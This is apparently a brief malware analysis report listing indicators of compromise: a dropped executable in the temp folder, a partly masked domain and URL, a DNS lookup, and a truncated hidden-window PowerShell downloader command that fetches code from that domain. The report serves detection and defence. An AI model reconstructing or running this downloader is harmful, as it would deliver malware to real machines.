Technical information
- %TEMP%\19514.exe
- 'bu#####ssensefm.co.uk':80
- http://bu#####ssensefm.co.uk/1/index.php
- DNS ASK bu#####ssensefm.co.uk
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;$urls = 'http://businesssensefm.co.uk/1/index.php'.Sp...' (with a hidden window)